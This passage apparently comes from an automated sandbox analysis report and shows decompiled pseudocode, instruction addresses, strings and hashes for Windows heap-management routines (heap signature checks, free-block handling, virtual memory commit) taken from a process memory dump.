0x01818229
0x01818238
0x01818238
0x0181823d
0x0181823d
0x017c3da0
0x017c3daf
0x017c3db5
0x017c3dba
0x017c3dba
0x017c3dd4
0x017c3e94
0x017c3eab
0x017c3f6d
0x017c3f84
0x017c406b
0x017c406b
0x017c406e
0x017c406e
0x017c4070
0x017c4074
0x01818351
0x01818351
0x017c407a
0x017c407f
0x0181835d
0x01818370
0x01818377
0x01818379
0x0181837c
0x0181837c
0x0181835d
0x00000000
0x017c407f
0x017c3f8a
0x017c3f8d
0x017c3f90
0x017c3f95
0x0181830d
0x0181830f
0x017c3f9b
0x017c3fac
0x017c3fae
0x017c3fb1
0x017c3fb1
0x017c3fb6
0x01818317
0x0181831a
0x00000000
0x017c3fbc
0x017c3fc1
0x017c3fc9
0x017c3fd7
0x017c3fda
0x017c3fdd
0x017c4021
0x017c4021
0x017c4029
0x017c4030
0x017c4044
0x017c4046
0x017c4046
0x017c4044
0x017c4049
0x01818327
0x01818334
0x01818339
0x0181833c
0x017c404f
0x017c404f
0x017c404f
0x017c4051
0x017c4056
0x017c4063
0x017c4063
0x017c4068
0x00000000
0x017c4068
0x017c3fdf
0x017c3fe2
0x017c3fe4
0x017c3fe7
0x017c3fef
0x017c4003
0x017c4005
0x017c4005
0x017c400c
0x017c4013
0x017c4016
0x017c4017
0x017c401b
0x017c401e
0x00000000
0x017c401e
0x017c3fb6
0x017c3eb1
0x017c3eb4
0x017c3eb7
0x017c3ebc
0x018182a9
0x018182ab
0x017c3ec2
0x017c3ed3
0x017c3ed5
0x017c3ed8
0x017c3ed8
0x017c3edd
0x018182b3
0x018182b6
0x00000000
0x017c3ee3
0x017c3ee8
0x017c3eed
0x017c3ef0
0x017c3ef3
0x017c3f02
0x017c3f05
0x017c3f08
0x018182c0
0x018182c3
0x018182c5
0x018182c8
0x018182d0
0x018182e4
0x018182e6
0x018182e6
0x018182ed
0x018182f4
0x018182f7
0x018182f8
0x018182fc
0x018182ff
0x018182ff
0x017c3f0e
0x017c3f11
0x017c3f16
0x017c3f1d
0x017c3f31
0x01818307
0x01818307
0x017c3f31
0x017c3f39
0x017c3f48
0x017c3f4d
0x017c3f50
0x017c3f50
0x017c3f53
0x017c3f58
0x017c3f65
0x017c3f65
0x017c3f6a
0x00000000
0x017c3f6a
0x017c3edd
0x017c3dda
0x017c3ddd
0x017c3de0
0x017c3de5
0x01818245
0x017c3deb
0x017c3df7
0x017c3dfc
0x017c3dfe
0x017c3e01
0x017c3e01
0x017c3e06
0x0181824d
0x0181824f
0x01818254
0x00000000
0x017c3e0c
0x017c3e11
0x017c3e16
0x017c3e19
0x017c3e29
0x017c3e2c
0x017c3e2f
0x0181825c
0x0181825f
0x01818261
0x01818264
0x0181826c
0x01818280
0x01818282
0x01818282
0x01818289
0x01818290
0x01818293
0x01818294
0x01818298
0x0181829b
0x0181829b
0x017c3e35
0x017c3e38
0x017c3e3d
0x017c3e44
0x017c3e58
0x018182a3
0x018182a3
0x017c3e58
0x017c3e60
0x017c3e6f
0x017c3e74
0x017c3e77
0x017c3e77
0x017c3e7a
0x017c3e7f
0x017c3e8c
0x017c3e8c
0x017c3e91
0x00000000
0x017c3e91

Strings

Kernel-MUI-Language-Allowed, xrefs: 017C3DC0
Kernel-MUI-Language-Disallowed, xrefs: 017C3E97
Kernel-MUI-Language-SKU, xrefs: 017C3F70
Kernel-MUI-Number-Allowed, xrefs: 017C3D8C
WindowsExcludedProcs, xrefs: 017C3D6F

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 2aa3c55cc93e1c966c0547dcef29386fba833f41c7e9cc48169b3896fc823690
Instruction ID: f55fdb2a58fb8b1e7959f2632a89503792fff84fb9a22ced9f178f90ce2bf664
Opcode Fuzzy Hash: 2aa3c55cc93e1c966c0547dcef29386fba833f41c7e9cc48169b3896fc823690
Instruction Fuzzy Hash: 47F12972D00619EBCB16DF98C984AEEFBB9FF48B50F15406EE906E7254D7349A018B90

Uniqueness

Uniqueness Score: -1.00%

Function 017B40E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E017B40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E017BB150();
					} else {
						E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017BB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E017BB150(", passed to %s", _t29);
					}
					_push("\n");
					E017BB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x18a6378 = 1;
						asm("int3");
						 *0x18a6378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x017b40e6
0x017b40e8
0x017b40f1
0x0181042d
0x0181044c
0x01810451
0x0181042f
0x01810444
0x01810449
0x0181045d
0x01810466
0x0181046e
0x01810474
0x01810475
0x0181047a
0x0181048a
0x0181048c
0x01810493
0x01810494
0x01810494
0x00000000
0x0181049b
0x00000000

Strings

Invalid heap signature for heap at %p, xrefs: 01810458
RtlAllocateHeap, xrefs: 01810468
HEAP: , xrefs: 0181044C
HEAP[%wZ]: , xrefs: 0181043F
, passed to %s, xrefs: 01810469

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: 81d49f05fbfd9a41b419d35d463ae7d92146cef047fc31aeec3af1b2fbc8e1b8
Instruction ID: 18192cead553a2258360aff1eafa523643c789eb9ae874ce605ba16e66e44091
Opcode Fuzzy Hash: 81d49f05fbfd9a41b419d35d463ae7d92146cef047fc31aeec3af1b2fbc8e1b8
Instruction Fuzzy Hash: D40128331402459EE325976DF8DEF92F7ACDB00B34F28806EF409876499BA89584C614

Uniqueness

Uniqueness Score: -1.00%

Function 017DA830, Relevance: 5.4, Strings: 4, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E017DA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x18a8748 - 1;
					if( *0x18a8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E017BB150();
									_t260 = _t257 + 4;
								} else {
									E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E017BB150();
								_t257 = _t260 + 4;
								__eflags =  *0x18a7bc8;
								if(__eflags == 0) {
									E01872073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E0187A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E0180D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E017DAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E0187A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E0187A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x18a8748 - 1;
					if( *0x18a8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E017BB150();
							} else {
								E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E017BB150();
							__eflags =  *0x18a7bc8;
							if(__eflags == 0) {
								_t131 = E01872073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}

0x017da83a
0x017da83c
0x017da83e
0x017da841
0x017da844
0x017da84a
0x017daa53
0x017daa59
0x017daa59
0x017da858
0x017da85e
0x017daaf5
0x017daafc
0x0182229e
0x018222a2
0x018222a8
0x018222b3
0x018222b5
0x018222bb
0x018222c1
0x018222c5
0x018222e6
0x018222eb
0x018222f0
0x018222c7
0x018222dc
0x018222e1
0x018222e1
0x018222f3
0x018222f8
0x018222fd
0x01822300
0x01822307
0x0182230e
0x0182230e
0x01822313
0x01822313
0x018222b5
0x018222a2
0x017daafc
0x017da864
0x017da869
0x017daa5c
0x017daa5e
0x017da86f
0x017da87f
0x017da885
0x017da885
0x017da88b
0x017da890
0x017da896
0x017dab0c
0x017dab0f
0x017dab15
0x01822320
0x01822320
0x017dab1b
0x017da89c
0x017da89f
0x017da8a2
0x017da8a2
0x017da8a5
0x017da8af
0x017da8b3
0x017da8b8
0x017daa66
0x017da8be
0x017da8c5
0x017da8c6
0x017da8ce
0x01822328
0x01822332
0x01822337
0x01822337
0x017da8ce
0x017da8d4
0x017da8d8
0x017da8db
0x017da8de
0x017da8e1
0x017da8e5
0x017da8e8
0x017da8f0
0x017da8f3
0x0182234c
0x01822350
0x01822355
0x01822359
0x01822359
0x017da8f9
0x017da901
0x017daae4
0x017daae4
0x017daaea
0x00000000
0x017da907
0x017da90a
0x017da91d
0x017da91d
0x00000000
0x017da910
0x017da910
0x017da910
0x017da914
0x017da924
0x017da924
0x017da924
0x017da924
0x017da916
0x017da91b
0x00000000
0x00000000
0x00000000
0x017da91b
0x017da925
0x017da925
0x017da932
0x017da936
0x017da93c
0x017da93c
0x017da93c
0x017dab22
0x017dab24
0x017dab27
0x017dab27
0x017da942
0x017da944
0x017daaba
0x017daabd
0x017daac0
0x017daac0
0x017daac2
0x017dab2f
0x017daac4
0x017daac4
0x017daac7
0x017daaca
0x017daacc
0x017daace
0x017daace
0x017daace
0x017daad1
0x017daad1
0x017daad7
0x017daad9
0x00000000
0x00000000
0x01822361
0x01822369
0x0182236b
0x00000000
0x01822371
0x00000000
0x01822371
0x00000000
0x0182236b
0x017daac0
0x017da94a
0x017da94a
0x017da94d
0x017da94d
0x017da950
0x017da954
0x01822376
0x01822380
0x017da95a
0x017da95a
0x017da95c
0x017da95f
0x017da961
0x017da961
0x017da967
0x017da96a
0x017da972
0x017daa02
0x017daa06
0x017daa10
0x017daa16
0x017daa16
0x017daa1b
0x017daa21
0x017daa24
0x017daa27
0x017daa29
0x017daa2c
0x017daa32
0x00000000
0x00000000
0x00000000
0x00000000
0x017da978
0x017da978
0x017da97b
0x017da981
0x017da996
0x017da998
0x017da99f
0x017da9a2
0x0182238a
0x017da9a8
0x017da9a8
0x017da9a8
0x017da9aa
0x017da9ad
0x017da9b0
0x017da9bb
0x017da9be
0x017da9c7
0x017da9c9
0x017da9c9
0x017da9cc
0x017da9d1
0x017daa6d
0x017daa70
0x017daa73
0x017daa75
0x017daa79
0x017daa7e
0x017daa82
0x017daa8f
0x017daa94
0x017daa96
0x01822392
0x018223a1
0x018223a1
0x017daa9c
0x017daa9f
0x017daaa2
0x017daaa2
0x017daaa8
0x017daaab
0x017daaaf
0x00000000
0x017daab5
0x00000000
0x017daab5
0x017da9d7
0x017da9d7
0x017da9da
0x017da9e0
0x017da9e3
0x017da9e6
0x017da9e9
0x017da9eb
0x017da9fd
0x017da9fd
0x00000000
0x017da9eb
0x00000000
0x00000000
0x00000000
0x017da983
0x017da983
0x017da983
0x017da987
0x017da995
0x017da995
0x017da995
0x017da995
0x017da989
0x017da98e
0x00000000
0x017da990
0x00000000
0x017da990
0x017da98e
0x00000000
0x017da983
0x017da972
0x017da90a
0x017daa34
0x017daa34
0x017daa40
0x017daa43
0x017daa46
0x017daa4d
0x018223ab
0x018223b2
0x018223b8
0x018223be
0x018223c3
0x018223c5
0x018223cb
0x018223d1
0x018223d5
0x018223f6
0x018223fb
0x018223d7
0x018223ec
0x018223f1
0x01822403
0x01822408
0x01822410
0x01822417
0x01822422
0x01822422
0x01822417
0x018223c5
0x018223b2
0x00000000

Strings

ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01822403
HEAP: , xrefs: 018222E6, 018223F6
((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 018222F3
HEAP[%wZ]: , xrefs: 018222D7, 018223E7

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: eed070ce38098089d384c58398029284dcd664fce761829e7491200c1a0e792d
Instruction ID: abb3b3c7f7880c254499f86f13d84635aa039bf02aded3a1dfbc71d18ed56744
Opcode Fuzzy Hash: eed070ce38098089d384c58398029284dcd664fce761829e7491200c1a0e792d
Instruction Fuzzy Hash: 2BD1B074A0024A8FDB19CF68C494BBAFBF2FF88300F158569D9569B346E334EA45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 017DA229, Relevance: 5.2, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E017DA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E017DDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E017F9730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0187A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E017F9660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E017BB150();
					} else {
						E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E017BB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E017D7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0187138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E017D7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E017D7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01871582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E017D7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E017D7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E01871582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0180D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}

0x017da229
0x017da231
0x017da23f
0x017da242
0x017da244
0x017da24c
0x017da255
0x017da25a
0x017da25f
0x01821c76
0x01821c78
0x01821c7e
0x01821c7f
0x01821c81
0x01821c82
0x01821c84
0x01821c89
0x01821c8b
0x01821c9e
0x01821c9e
0x01821cab
0x01821cb2
0x00000000
0x01821cb2
0x01821c8d
0x01821c92
0x00000000
0x00000000
0x01821c94
0x01821c98
0x00000000
0x00000000
0x00000000
0x01821c98
0x017da265
0x017da265
0x017da266
0x017da26f
0x017da270
0x017da276
0x017da277
0x017da279
0x017da27e
0x017da282
0x01821db5
0x01821dbb
0x01821dc1
0x01821dc5
0x01821de4
0x01821de9
0x01821dc7
0x01821ddc
0x01821de1
0x01821def
0x01821df3
0x01821df7
0x01821dfe
0x01821e06
0x017da302
0x017da308
0x017da308
0x017da288
0x017da28d
0x017da294
0x01821cc1
0x017da29a
0x017da29a
0x017da29a
0x017da29f
0x01821ccb
0x01821cd1
0x01821cd8
0x01821cea
0x01821cea
0x01821cd8
0x017da2a9
0x017da2af
0x017da2bc
0x01821cfd
0x017da2c2
0x017da2c2
0x017da2c2
0x017da2c7
0x01821d07
0x01821d0d
0x01821d14
0x01821d1f
0x01821d21
0x01821d2c
0x01821d2c
0x01821d2c
0x01821d47
0x01821d47
0x01821d14
0x017da2cd
0x017da2d2
0x017da2d9
0x01821d5a
0x017da2df
0x017da2df
0x017da2df
0x017da2e4
0x01821d69
0x01821d6b
0x01821d76
0x01821d76
0x01821d76
0x01821d91
0x01821d91
0x017da2ea
0x017da2f0
0x017da2f5
0x01821da8
0x01821dad
0x01821dad
0x017da2fd
0x017da300
0x00000000

Strings

ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 01821DF9
HEAP: , xrefs: 01821DE4
`, xrefs: 01821C8D
HEAP[%wZ]: , xrefs: 01821DD7

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: e707546a2e0ea5dae0dbe37fa525864fc5e1966dab89cb175e6723ca10a9b30b
Instruction ID: a0a5751ca244923b2e40da485009b28f3e6bb7fbb0d110c34dd23a44b07708e8
Opcode Fuzzy Hash: e707546a2e0ea5dae0dbe37fa525864fc5e1966dab89cb175e6723ca10a9b30b
